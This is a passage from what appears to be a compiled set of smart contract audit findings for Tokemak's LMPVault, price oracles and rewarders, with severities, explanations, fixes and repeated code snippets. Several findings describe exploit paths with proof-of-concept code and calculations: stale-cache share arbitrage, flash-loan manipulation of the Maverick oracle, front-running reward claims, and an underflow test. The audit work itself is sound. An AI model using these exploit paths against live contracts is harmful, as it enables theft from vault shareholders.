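# Shares are priced against the stale cached total assets.
shares = deposit * total_supply / cached_assets        # ~9.0909 shares

# Redeem after updateDebtReporting() syncs the cache to the actual value.
assets_out = shares * (actual_assets + deposit) / (total_supply + shares)
profit = assets_out - deposit
print(float(assets_out), float(profit))  # ~10.4167 WETH out, ~0.4167 WETH profit
```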
Consider updating $totalAssets_{cached}$ to $totalAssets_{actual}$ before any withdrawal or deposit to mitigate this issue.
Loss of assets for vault shareholders. The attacker's gain is the loss of other vault shareholders.
```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n
Incorrect pricing for CurveV2 LP Token
high
Using the Curve rETH/frxETH pool (0xe7c6e0a739021cdba7aac21b4b728779eef974d9) to illustrate the issue:\\nThe price of the LP token of Curve rETH/frxETH pool can be obtained via the following `lp_price` function:\\n```\\ndef lp_price() -> uint256:\\n """\\n Approximate LP token price\\n """\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n\\nThus, the formula to obtain the price of the LP token is as follows:\\n$$ price_{LP} = 2 \\times virtualPrice \\times \\sqrt{internalPriceOracle} $$\\n```\\ndef price_oracle() -> uint256:\\n return self.internal_price_oracle()\\n```\\n\\nThe $internalPriceOracle$ is the price of coins[1](frxETH) with coins[0](rETH) as the quote currency, which means how many rETH (quote) are needed to purchase one frxETH (base).\\n$$ base/quote \\ frxETH/rETH $$\\nDuring pool registration, the `poolInfo.tokenToPrice` is always set to the second coin (coins[1]) as per Line 131 below. In this example, `poolInfo.tokenToPrice` will be set to frxETH token address (coins[1]).\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function registerPool(address curvePool, address curveLpToken, bool checkReentrancy) external onlyOwner {\\n..SNIP..\\n /**\\n * Curve V2 pools always price second token in `coins` array in first token in `coins` array. This means that\\n * if `coins[0]` is Weth, and `coins[1]` is rEth, the price will be rEth as base and weth as quote. Hence\\n * to get lp price we will always want to use the second token in the array, priced in eth.\\n */\\n lpTokenToPool[lpToken] =\\n PoolData({ pool: curvePool, checkReentrancy: checkReentrancy ? 
1 : 0, tokenToPrice: tokens[1] });\\n```\\n\\nNote that `assetPrice` variable below is equivalent to $internalPriceOracle$ in the above formula.\\nWhen fetching the price of the LP token, Line 166 computes the price of frxETH with ETH as the quote currency ($frxETH/ETH$) via the `getPriceInEth` function, and assigns to the `assetPrice` variable.\\nHowever, the $internalPriceOracle$ or `assetPrice` should be $frxETH/rETH$ instead of $frxETH/ETH$. Thus, the price of the LP token computed will be incorrect.\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function getPriceInEth(address token) external returns (uint256 price) {\\n Errors.verifyNotZero(token, "token");\\n\\n PoolData memory poolInfo = lpTokenToPool[token];\\n if (poolInfo.pool == address(0)) revert NotRegistered(token);\\n\\n ICryptoSwapPool cryptoPool = ICryptoSwapPool(poolInfo.pool);\\n\\n // Checking for read only reentrancy scenario.\\n if (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n }\\n\\n uint256 virtualPrice = cryptoPool.get_virtual_price();\\n uint256 assetPrice = systemRegistry.rootPriceOracle().getPriceInEth(poolInfo.tokenToPrice);\\n\\n return (2 * virtualPrice * sqrt(assetPrice)) / 10 ** 18;\\n }\\n```\\n
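A rough sketch of the resulting mispricing, with hypothetical rates (frxETH/rETH ≈ 0.92, frxETH/ETH ≈ 0.998, virtual price 1.0 — all toy assumptions, not on-chain values). The helper approximates the oracle's `2 * virtualPrice * sqrt(assetPrice) / 1e18` formula, where the root of a 1e18-scaled input is itself 1e18-scaled:

```python
import math

SCALE = 10**18

def lp_price(virtual_price, asset_price):
    # Approximates the oracle: 2 * virtualPrice * sqrt(assetPrice) / 1e18,
    # with sqrt() returning the 1e18-scaled root of a 1e18-scaled input.
    sqrt_price = math.isqrt(asset_price * SCALE)
    return 2 * virtual_price * sqrt_price // SCALE

virtual_price = 1 * SCALE
frx_in_reth = 92 * SCALE // 100    # hypothetical: what the formula expects
frx_in_eth = 998 * SCALE // 1000   # hypothetical: what getPriceInEth supplies

correct = lp_price(virtual_price, frx_in_reth)
wrong = lp_price(virtual_price, frx_in_eth)
print(wrong / correct)  # ~1.04 -- LP token overpriced by ~4% in this sketch
```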
Update the `getPriceInEth` function to ensure that the $internalPriceOracle$ or `assetPrice` returns the price of `coins[1]` with `coins[0]` as the quote currency.
The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing of LP tokens would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.
```\\ndef lp_price() -> uint256:\\n """\\n Approximate LP token price\\n """\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n
Incorrect number of shares minted as fee
high
```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n\\nAssume that the following states:\\nThe `profit` is 100 WETH\\nThe fee is 20%, so the `fees` will be 20 WETH.\\n`totalSupply` is 100 shares and `totalAssets()` is 1000 WETH\\nLet the number of shares to be minted be $shares2mint$. The current implementation uses the following formula (simplified) to determine $shares2mint$.\\n$$ \\begin{align} shares2mint &= fees \\times \\frac{totalSupply}{totalAsset()} \\ &= 20\\ WETH \\times \\frac{100\\ shares}{1000\\ WETH} \\ &= 2\\ shares \\end{align} $$\\nIn this case, two (2) shares will be minted to the `sink` address as the fee is taken.\\nHowever, the above formula used in the codebase is incorrect. The total cost/value of the newly-minted shares does not correspond to the fee taken. Immediately after the mint, the value of the two (2) shares is worth only 19.60 WETH, which does not correspond to the 20 WETH fee that the `sink` address is entitled to.\\n$$ \\begin{align} value &= 2\\ shares \\times \\frac{1000\\ WETH}{100 + 2\\ shares} \\ &= 2\\ shares \\times 9.8039\\ WETH\\ &= 19.6078\\ WETH \\end{align} $$
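The dilution can be verified with exact fractions (same toy numbers as above), along with the mint amount that does land on the intended 20 WETH once post-mint dilution is accounted for:

```python
from fractions import Fraction as F

total_supply = F(100)   # shares
total_assets = F(1000)  # WETH
fees = F(20)            # WETH owed to the sink

# Current mint: fee priced at the pre-mint share price.
shares_minted = fees * total_supply / total_assets             # 2 shares
value_after = shares_minted * total_assets / (total_supply + shares_minted)
print(float(value_after))  # ~19.6078 WETH -- short of the 20 WETH fee

# Corrected mint: solve value(shares) == fees for shares.
shares_exact = fees * total_supply / (total_assets - fees)     # ~2.0408 shares
value_exact = shares_exact * total_assets / (total_supply + shares_exact)
print(float(shares_exact), float(value_exact))  # ~2.0408 shares worth 20 WETH
```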
The correct formula to compute the number of shares minted as fee should be as follows:\n$$ \begin{align} shares2mint &= \frac{profit \times performanceFeeBps \times totalSupply}{(totalAsset() \times MAX_FEE_BPS) - (performanceFeeBps \times profit) } \ &= \frac{100\ WETH \times 2000 \times 100\ shares}{(1000\ WETH \times 10000) - (2000 \times 100\ WETH)} \ &= 2.0408163265306122448979591836735\ shares \end{align} $$\nThe following is the proof to show that `2.0408163265306122448979591836735` shares are worth 20 WETH after the mint.\n$$ \begin{align} value &= 2.0408163265306122448979591836735\ shares \times \frac{1000\ WETH}{100 + 2.0408163265306122448979591836735\ shares} \ &= 2.0408163265306122448979591836735\ shares \times 9.8039\ WETH\ &= 20\ WETH \end{align} $$
Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.
```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n
Maverick oracle can be manipulated
high
In the MavEthOracle contract, `getPriceInEth` function utilizes the reserves of the Maverick pool and multiplies them with the external prices of the tokens (obtained from the rootPriceOracle contract) to calculate the total value of the Maverick position.\\n```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n\\nHowever, the reserves of a Maverick position can fluctuate when the price of the Maverick pool changes. Therefore, the returned price of this function can be manipulated by swapping a significant amount of tokens into the Maverick pool. An attacker can utilize a flash loan to initiate a swap, thereby changing the price either upwards or downwards, and subsequently swapping back to repay the flash loan.\\nAttacker can decrease the returned price of MavEthOracle by swapping a large amount of the higher value token for the lower value token, and vice versa.\\nHere is a test file that demonstrates how the price of the MavEthOracle contract can be manipulated by swapping to change the reserves.
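The effect can be sketched with a toy constant-product pool standing in for the boosted position. Maverick's bin math differs, but the point is the same: a flash-loan swap shifts the spot reserves, and valuing those reserves at external prices moves the LP valuation. All numbers below are illustrative:

```python
from fractions import Fraction as F

res_a, res_b = F(1000), F(2000)  # reserves, initially aligned with oracle prices
lp_supply = F(1000)
price_a, price_b = F(2), F(1)    # external oracle prices in ETH

def naive_lp_price(ra, rb):
    # Mirrors the pattern above: value spot reserves at external prices.
    return (ra * price_a + rb * price_b) / lp_supply

before = naive_lp_price(res_a, res_b)   # 4 ETH per LP token

# Flash-loan swap: dump token B into the pool, draining token A.
k = res_a * res_b
res_b += 6000
res_a = k / res_b
after = naive_lp_price(res_a, res_b)

print(float(before), float(after))  # 4.0 -> 8.5: valuation moved by one swap
```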
Use a manipulation-resistant calculation for the Maverick oracle instead of valuing spot reserves at external prices.
An attacker can exploit MavEthOracle price manipulation in multiple ways:\nDecreasing the oracle price to lower the totalDebt of LMPVault, in order to receive more LMPVault shares.\nIncreasing the oracle price to raise the totalDebt of LMPVault, in order to receive more withdrawn tokens.\nManipulating the results of the Stats contracts to cause miscalculations for the protocol.
```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n
Aura/Convex rewards are stuck after DOS
high
Anyone can claim Convex rewards for any account.\n```\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\n uint256 reward = earned(_account);\n if (reward > 0) {\n rewards[_account] = 0;\n rewardToken.safeTransfer(_account, reward);\n IDeposit(operator).rewardClaimed(pid, _account, reward);\n emit RewardPaid(_account, reward);\n }\n\n //also get rewards from linked rewards\n if(_claimExtras){\n for(uint i=0; i < extraRewards.length; i++){\n IRewards(extraRewards[i]).getReward(_account);\n }\n }\n return true;\n}\n```\n\nIn ConvexRewardsAdapter, the rewards are accounted for by using balanceBefore/after.\n```\nfunction _claimRewards(\n address gauge,\n address defaultToken,\n address sendTo\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\n\n uint256[] memory balancesBefore = new uint256[](totalLength);\n uint256[] memory amountsClaimed = new uint256[](totalLength);\n// rest of code\n\n for (uint256 i = 0; i < totalLength; ++i) {\n uint256 balance = 0;\n // Same check for "stash tokens"\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\n balance = IERC20(rewardTokens[i]).balanceOf(account);\n }\n\n amountsClaimed[i] = balance - balancesBefore[i];\n\n return (amountsClaimed, rewardTokens);\n```\n\nAn adversary can call the external Convex contract's `getReward(tokemakContract)`. After this, the reward tokens are transferred to Tokemak without an accounting hook.\nNow, when Tokemak calls claimRewards, no new rewards are transferred because the attacker already transferred them, and `amountsClaimed` will be 0.
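A toy model of the delta accounting (Python stand-ins for the Convex rewarder and the adapter; all names are illustrative):

```python
class ToyRewarder:
    """Stand-in for a Convex reward pool with a permissionless getReward()."""
    def __init__(self, pending):
        self.pending = pending  # rewards owed to the adapter
        self.balances = {}      # token balances per address

    def get_reward(self, account):  # anyone may call this for any account
        self.balances[account] = self.balances.get(account, 0) + self.pending
        self.pending = 0

def claim_rewards(rewarder, adapter):
    # Mirrors the adapter's balanceBefore/after accounting.
    before = rewarder.balances.get(adapter, 0)
    rewarder.get_reward(adapter)
    after = rewarder.balances.get(adapter, 0)
    return after - before  # amount the adapter *thinks* it claimed

pool = ToyRewarder(pending=100)
pool.get_reward("adapter")           # attacker front-runs the claim
claimed = claim_rewards(pool, "adapter")
print(claimed, pool.balances["adapter"])  # 0 100 -- tokens arrive unaccounted
```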
Don't use balanceBefore/After. You could consider using `balanceOf(address(this))` after claiming to see the full amount of tokens in the contract. This assumes that only the specific rewards balance is in the contract.
Rewards are stuck in the LiquidationRow contract and not queued to the MainRewarder.
```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n
`LMPVault._withdraw()` can revert due to an arithmetic underflow
medium
Inside the `_withdraw()` function, the `maxAssetsToPull` argument value of `_calcUserWithdrawSharesToBurn()` is calculated to be equal to `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)`. However, the `_withdraw()` function only halts its loop when `info.totalAssetsPulled >= info.totalAssetsToPull`. This can lead to a situation where `info.debtDecrease >= info.totalAssetsToPull`. Consequently, when calculating `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)` for the next destination vault in the loop, an underflow occurs and triggers a contract revert.\\nTo illustrate this vulnerability, consider the following scenario:\\n```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // 
destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n }\\n```\\n
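The loop accounting reduces to a few lines. The running totals below are illustrative, chosen so that the realized loss pushes `debtDecrease` past `totalAssetsToPull` while `totalAssetsPulled` stays below it:

```python
total_assets_to_pull = 1000

# Illustrative totals after pulling from DV1 and DV2: DV2 realized a loss,
# so more debt was burned than assets actually came back.
debt_decrease = 1050
total_assets_pulled = 900

# The loop's halt condition only checks the assets actually pulled...
assert total_assets_pulled < total_assets_to_pull  # so the loop continues

# ...then computes the next destination's maxAssetsToPull as
# info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)
next_max_pull = total_assets_to_pull - max(debt_decrease, total_assets_pulled)
print(next_max_pull)  # -50 in Python; an arithmetic-underflow revert in Solidity 0.8
```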
To mitigate this vulnerability, it is recommended to break the loop within the `_withdraw()` function if `Math.max(info.debtDecrease, info.totalAssetsPulled) >= info.totalAssetsToPull`:\n```\n if (\n Math.max(info.debtDecrease, info.totalAssetsPulled) >\n info.totalAssetsToPull\n ) {\n info.idleIncrease =\n Math.max(info.debtDecrease, info.totalAssetsPulled) -\n info.totalAssetsToPull;\n if (info.totalAssetsPulled >= info.debtDecrease) {\n info.totalAssetsPulled = info.totalAssetsToPull;\n }\n break;\n }\n\n // No need to keep going if we have the amount we're looking for\n // Any overage is accounted for above. Anything lower and we need to keep going\n // slither-disable-next-line incorrect-equality\n if (\n Math.max(info.debtDecrease, info.totalAssetsPulled) ==\n info.totalAssetsToPull\n ) {\n break;\n }\n```\n
The vulnerability can result in the contract reverting due to an underflow, disrupting the functionality of the contract. Users who try to withdraw assets from the LMPVault may encounter transaction failures and be unable to withdraw their assets.
```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n }\\n```\\n
Unable to withdraw extra rewards
medium
Suppose Bob only has 9999 Wei TOKE tokens as main rewards and 100e18 DAI as extra rewards in this account.\\nWhen attempting to get the rewards, the code will always get the main rewards, followed by the extra rewards, as shown below.\\n```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n\\nIf the main reward is TOKE, they will be staked to the `GPToke` at Line 376 below.\\n```\\nFile: AbstractRewarder.sol\\n function _getReward(address account) internal {\\n Errors.verifyNotZero(account, "account");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither-disable-next-line incorrect-equality\\n if (reward == 0) return;\\n\\n rewards[account] = 0;\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n // authorize gpToke to get our reward Toke\\n // slither-disable-next-line unused-return\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n }\\n }\\n```\\n\\nHowever, if the staked amount is less than the minimum stake amount (MIN_STAKE_AMOUNT), the function will revert.\\n```\\nFile: GPToke.sol\\n uint256 public constant MIN_STAKE_AMOUNT = 10_000;\\n..SNIP..\\n function _stake(uint256 amount, uint256 duration, address to) internal whenNotPaused {\\n //\\n // validation checks\\n //\\n if (to == address(0)) revert ZeroAddress();\\n if (amount < MIN_STAKE_AMOUNT) revert StakingAmountInsufficient();\\n if (amount > 
MAX_STAKE_AMOUNT) revert StakingAmountExceeded();\\n```\\n\\nIn this case, Bob will not be able to redeem his 100 DAI reward when processing the reward. The code will always attempt to stake 9999 Wei Toke and revert because it fails to meet the minimum stake amount.
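The trap can be reduced to a short sketch (toy stand-ins for `_processRewards`, `_getReward`, and `GPToke.stake`):

```python
MIN_STAKE_AMOUNT = 10_000  # GPToke.MIN_STAKE_AMOUNT

def stake_toke(amount):
    # Stand-in for GPToke._stake()'s minimum-amount check.
    if amount < MIN_STAKE_AMOUNT:
        raise RuntimeError("StakingAmountInsufficient")

def process_rewards(main_toke_reward, extra_rewards):
    stake_toke(main_toke_reward)  # main TOKE reward is force-staked first
    return extra_rewards          # extra rewards only paid if staking succeeds

# Bob: 9999 wei of TOKE as main reward, 100e18 DAI as extra reward.
try:
    process_rewards(9_999, {"DAI": 100 * 10**18})
    claimed = True
except RuntimeError:
    claimed = False
print(claimed)  # False -- the 100 DAI extra reward is unreachable
```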
To remediate the issue, consider collecting TOKE and staking it to the `GPToke` contract only if it meets the minimum stake amount.\\n```\\nfunction _getReward(address account) internal {\\n Errors.verifyNotZero(account, "account");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline incorrect// Remove the line below\\nequality\\n if (reward == 0) return;\\n\\n// Remove the line below\\n rewards[account] = 0;\\n// Remove the line below\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n// Add the line below\\n if (reward >= MIN_STAKE_AMOUNT) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n// Add the line below\\n\\n // authorize gpToke to get our reward Toke\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline unused// Remove the line below\\nreturn\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n// Add the line below\\n }\\n }\\n}\\n```\\n
There is no guarantee that the users' TOKE rewards will always be larger than `MIN_STAKE_AMOUNT` as it depends on various factors such as the following:\\nThe number of vault shares they hold. If they hold little shares, their TOKE reward will be insignificant\\nIf their holding in the vault is small compared to the others and the entire vault, the TOKE reward they received will be insignificant\\nThe timing they join the vault. If they join after the reward is distributed, they will not be entitled to it.\\nAs such, the affected users will not be able to withdraw their extra rewards, and they will be stuck in the contract.
```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n
Malicious or compromised admin of certain LSTs could manipulate the price
medium
Important Per the contest detail page, admins of the external protocols are marked as "Restricted" (Not Trusted). This means that any potential issues arising from the external protocol's admin actions (maliciously or accidentally) are considered valid in the context of this audit.\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED?\nRESTRICTED\nNote This issue also applies to other supported Liquid Staking Tokens (LSTs) where the admin could upgrade the token contract code. Those examples are omitted for brevity, as the write-up and mitigation are the same and would duplicate this issue.\nPer the contest detail page, the protocol will hold and interact with the Swell ETH (swETH).\nLiquid Staking Tokens\nswETH: 0xf951E335afb289353dc249e82926178EaC7DEd78\nUpon inspection of the swETH on-chain contract, it was found that it is a Transparent Upgradeable Proxy. This means that the admin of the Swell protocol could upgrade the contracts.\nTokemak relies on the `swEth.swETHToETHRate()` function to determine the price of the swETH LST within the protocol. Thus, a malicious or compromised admin of Swell could upgrade the contract to have the `swETHToETHRate` function return an extremely high value to manipulate the total values of the vaults, resulting in users being able to withdraw more assets than expected, thus draining the LMPVault.\n```\nFile: SwEthEthOracle.sol\n function getPriceInEth(address token) external view returns (uint256 price) {\n // Prevents incorrect config at root level.\n if (token != address(swEth)) revert Errors.InvalidToken(token);\n\n // Returns in 1e18 precision.\n price = swEth.swETHToETHRate();\n }\n```\n
The protocol team should be aware of the above-mentioned risks and consider implementing additional controls to reduce the risks.\\nReview each of the supported LSTs and determine how much power the Liquid staking protocol team/admin has over its tokens.\\nFor LSTs that are more centralized (e.g., Liquid staking protocol team could update the token contracts or have the ability to update the exchange rate/price to an arbitrary value without any limit), those LSTs should be subjected to additional controls or monitoring, such as implementing some form of circuit breakers if the price deviates beyond a reasonable percentage to reduce the negative impact to Tokemak if it happens.
Loss of assets in the scenario as described above.
```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n
`previewRedeem` and `redeem` functions deviate from the ERC4626 specification
medium
Important The contest page explicitly mentioned that the `LMPVault` must conform with the ERC4626. Thus, issues related to EIP compliance should be considered valid in the context of this audit.\\nQ: Is the code/contract expected to comply with any EIPs? Are there specific assumptions around adhering to those EIPs that Watsons should be aware of?\\nsrc/vault/LMPVault.sol should be 4626 compatible\\nLet the value returned by `previewRedeem` function be $asset_{preview}$ and the actual number of assets obtained from calling the `redeem` function be $asset_{actual}$.\\nThe following specification of `previewRedeem` function is taken from ERC4626 specification:\\nAllows an on-chain or off-chain user to simulate the effects of their redeemption at the current block, given current on-chain conditions.\\nMUST return as close to and no more than the exact amount of `assets` that would be withdrawn in a `redeem` call in the same transaction. I.e. `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction.\\nIt mentioned that the `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction, which means that it must always be $asset_{preview} \\le asset_{actual}$.\\nHowever, it is possible that the `redeem` function might return fewer assets than the number of assets previewed by the `previewRedeem` ($asset_{preview} > asset_{actual}$), thus it does not conform to the specification.\\n```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n\\nNote that the `previewRedeem` function performs its computation based on the cached `totalDebt` and `totalIdle`, which might not have been updated to reflect the actual on-chain market condition. Thus, these cached values might be higher than expected.\\nAssume that `totalIdle` is zero and all WETH has been invested in the destination vaults. Thus, `totalAssetsToPull` will be set to $asset_{preview}$.\\nIf a DV is making a loss, users could only burn an amount proportional to their ownership of this vault. The code will go through all the DVs in the withdrawal queue (withdrawalQueueLength) in an attempt to withdraw as many assets as possible. However, it is possible for the `totalAssetsPulled` to be less than $asset_{preview}$.\\n```\\nFile: LMPVault.sol\\n function _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n ) internal virtual returns (uint256) {\\n uint256 idle = totalIdle;\\n WithdrawInfo memory info = 